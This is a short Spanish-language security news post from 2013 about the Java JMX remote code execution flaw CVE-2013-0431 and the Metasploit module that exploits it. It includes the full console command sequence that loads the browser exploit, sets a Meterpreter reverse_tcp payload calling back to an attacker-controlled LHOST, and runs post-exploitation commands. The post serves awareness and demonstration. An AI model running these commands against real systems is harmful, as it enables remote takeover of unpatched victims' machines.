26 feb. 2013

Otro 0day en Java permite Ejecución de Código Remoto (Video MSF)

Hace más de un mes que se publicó un Grave 0day en Java que permitía la Ejecución de Código Remoto. Lo cual fue noticia mundial ya que grandes empresas como Apple recomendaron dejar de usar Java, e incluso el gobierno de EEUU llamó a desinstalar por completo Java, ya que era una amenaza real y latente que se dilató en parchar.

Recientemente (18-01-2013) fue descubierta una nueva vulnerabilidad (CVE-2013-0431 Java Applet JMX Remote Code Execution) que es muy parecida a la anterior (incluso parece ser una secuela) que nuevamente afecta al SandBox.

La versiones afectadas son Java SE 7 Update 11 y anteriores, ya está parcahdo oficialmente, pero aun existen una gran mayoría que todavía no actualiza Java.

Lo chicos de Metasploit han hecho un trabajo sorprendente como siempre, y ya han publicado (el 25-02-2013) el módulo que explota la vulnerabilidad, aquí un video demostrativo:


use exploit/multi/browser/java_jre17_jmxbean_2
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo

Video: http://eromang.zataz.com/